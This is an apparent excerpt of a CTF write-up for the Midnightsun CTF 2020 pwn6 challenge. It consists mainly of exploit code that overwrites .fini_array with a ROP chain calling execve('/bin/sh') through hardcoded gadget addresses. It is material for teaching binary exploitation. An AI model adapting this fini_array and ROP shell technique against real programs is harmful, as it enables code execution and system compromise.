fini_array attack with rop

fini_array = 0x6d2150
raw = [0x0000000000400b00,   # 0 -> leave 
       0x0000000000400590,   # 1 -- nop
       0x0000000d00000002,   # 2 -> prdi
       0x00000000004ada80,   # 3 -> 0x6d21a8 -> /bin/sh
       0x00000000004ada60,   # 4 -> prsi
       0x0000000000000000,   # 5 -- 0 
       0x00000000006d44c0,   # 6 -> prdx
       0x0000000000000001,   # 7 -> 0
       0x00000000006d4440,   # 8 -> prax
       0x0000000000000001,   # 9 -> 0x3b
       0x00000000004b2680,   # 10-> syscall
       0x00000000004b25a0]   # 11-> /bin/sh
       
ropchain = [leave,
            0x0000000000400590,
            prdi,
            0x6d21a8,
            prsi,
            0,
            prdx,
            0,
            prax,
            0x3b,
            syscall,
            u64('/bin/sh\0')]

modify(0x6D7330,0x80000000)
for i in range(len(ropchain)):
    modify(fini_array+8*i,raw[i]^ropchain[i])
# debug('b *0x400590')
sla('\x1B[1maddr:\x1B[m ','0x6D7330:9')

read more

Original writeup (http://taqini.space/2020/05/08/Midnightsun-CTF-2020-pwn6-wp/#modify-fini-array).